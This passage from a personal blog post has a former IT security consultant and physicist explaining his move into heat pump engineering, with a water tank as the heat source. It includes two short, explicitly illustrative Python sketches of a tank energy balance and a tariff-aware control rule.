I wanted less reputation as the internationally renowned high-flyer in IT, and more hands-on, down-to-earth work. Ironically, the fact that security is hot in the corporate world started to turn me off. I felt I stood on the wrong side of the fence, or of the negotiation table – as an effectively Anti-Security Consultant who helped productive business units to remain productive despite security and compliance policies. Probably worth a post of its own, but my favorite theory is: if you try to enforce policies beyond a certain limit, people will pour all their creativity into circumventing the processes and beating the system. And right they are, because they could not do their jobs otherwise.

For many years a resource-consuming background process of soul-searching was concerned with checking various options from my portfolio of passions. I was looking for a profession that:

  • is based on technology that is not virtual, but allows for utilizing my know-how in IT infrastructure and security as an add-on.
  • allows for working with clients whose sites can be reached by car – not by plane.
  • allows for self-consistency and authenticity: Practice what you preach / Turn your hobby into a job.
  • utilizes the infamous physicist’s analytical skills, that is, combines (just anything): theoretical calculations, hands-on engineering, managing the design of complex technical systems, dealing with customer requirements versus available technical solutions.

The last item is a pet topic of mine: As a physicist – even as an applied physicist – you have not been trained for a specific job. Physics is more similar to philosophy than to engineering in this respect. We are dilettantes in the best sense – and that is why many physicists end up in IT, management consulting or finance for example.

There are interdisciplinary fields of research that utilize physics via a sort of mathematical analog – think “Bose-Einstein condensation” in networking theory. According to another debatable theory of mine, we have nearly blown up the financial system because of the many former scientists working in finance – on the physics of Wall Street – who were more interested in doing something that mathematically resembles physics than in the impact on the real world.

Solar collector, optimized for harvesting ambient heat by convection in winter time. Image credits: punktwissen / our German blog.

(3) And Now for Something Completely Different: Heat Pump Systems and Sustainability

Though I am truly interested in the foundations of physics, fascinated by the LHC, and even intrigued by econophysics, I prefer to work on mundane applications of physics in engineering, as long as that allows for working on a solution to a problem that really matters right now.

Such as the effective utilization of the limited resources available on our planet. Anyone who believes exponential growth can go on forever in a finite world is either a madman or an economist (Kenneth Boulding). I do not want to enter the debate on climate warming, and I do not think it makes sense to attempt to evangelize people with ethical arguments. Why should we act in a more responsible way than all the generations before us? My younger self, traveling the globe by plane, would not have listened to those arguments either.

However, I think we are all – green or not – striving for personal and economic independence and autonomy: as individuals, as home owners, as businesses.

That’s what got me (us) interested in renewable energy some time ago, and we started working on our personal pilot project that finally turned into a research project / ‘garage start-up’.

We have finally come up with a concept of a heat pump system that uses an unconventional source of heat: the heat pump does not draw heat from the ground, ground water or air, but from a large low-temperature reservoir – a cistern, in a sense. Ambient heat is in turn transferred to the water tank by means of a solar collector. A simple collector built from hoses (as depicted above) works better than a flat plate collector that relies on heat transfer via radiation.

As with PKI, this is more interesting than it sounds, and it is really about combining just anything: numerical simulations and building stuff, consulting and product development, scrutinizing product descriptions provided by vendors and dealing with industry standards. None of the components of the heat pump system is special – we did not invent a device defying the laws of physics – but it is the controlling logic that matters most.
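
Just to give a flavor of the kind of energy bookkeeping behind that ‘controlling logic’, here is a deliberately simplified, purely illustrative Python sketch of a daily energy balance for the water tank. All parameter values and names are made up for this post – they are not taken from our actual simulations:

# Toy daily energy balance for the water-tank heat source.
# All numbers are made-up illustration values, not results from our simulations.

TANK_CAPACITY_KWH = 2000.0   # assumed usable heat content of the cistern / tank
COP = 4.0                    # assumed coefficient of performance of the heat pump

def simulate_day(tank_energy_kwh, heating_demand_kwh, collector_gain_kwh):
    """Advance the tank's energy balance by one day."""
    electrical_input = heating_demand_kwh / COP              # electricity driving the compressor
    heat_from_tank = heating_demand_kwh - electrical_input   # the rest is drawn from the tank
    tank_energy_kwh += collector_gain_kwh - heat_from_tank   # collector replenishes the tank
    tank_energy_kwh = min(tank_energy_kwh, TANK_CAPACITY_KWH)  # tank cannot store more than capacity
    return tank_energy_kwh, electrical_input

# Example: a cold winter day with little ambient gain from the collector
tank, electricity = simulate_day(tank_energy_kwh=1500.0,
                                 heating_demand_kwh=80.0,
                                 collector_gain_kwh=20.0)
print(f"Tank energy: {tank:.0f} kWh, electricity used: {electricity:.0f} kWh")

The interesting part in practice is of course not this arithmetic, but deciding when to run which component – which is exactly the controlling logic mentioned above.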

I am going to extend the scope for combining anything even further: having enrolled in a Master’s degree program in energy engineering in 2011, I will focus on smart metering in my master’s thesis. Future volatile electricity tariffs (communicated by intelligent meters) will play an important role in the management and control of heat pump systems, and there are lots of security risks to be considered.
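
To give a rough idea of what tariff-aware control could mean, here is an equally naive sketch – the temperatures, the price threshold and the function name are hypothetical placeholders, not the logic of any real controller:

def heat_pump_should_run(buffer_temp_c, price_eur_per_kwh,
                         min_temp_c=30.0, max_temp_c=45.0,
                         price_threshold_eur=0.20):
    """Naive rule: keep comfort, but prefer to run the heat pump when power is cheap."""
    if buffer_temp_c < min_temp_c:
        return True    # comfort first: always heat when the buffer is too cold
    if buffer_temp_c >= max_temp_c:
        return False   # buffer is charged - no need to run the pump
    return price_eur_per_kwh <= price_threshold_eur  # in between: run only on cheap tariffs

# Example: buffer temperature in the middle of the band, cheap night tariff
print(heat_pump_should_run(buffer_temp_c=38.0, price_eur_per_kwh=0.12))   # -> True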

It is all about systems, interfaces, and connections – not only in social media and IT, but also in building technology and engineering. Actually, all of that is converging onto one big cloudy network (probably subject to chaotic phenomena similar to those in the financial markets). I am determined to make some small contribution to that.

(4) Concluding and Confusing Remark

Now I feel like Achilles and the Tortoise in Gödel, Escher, Bach (*) – in the chapter on pushing and popping through many levels of the story or the related dreamscape. I am not sure if I have reached the base level I started from. This might be a cliff-hanger.

(*) This is also a subtle tribute to the friend – and musician – mentioned above.

~~~

There should be an epilogue. Time-travelling back from 2018, I am adding this comment: I think I have never actually traded in anything for anything! Here I am, in 2018, and I am still doing PKI, in parallel to the heat pumps!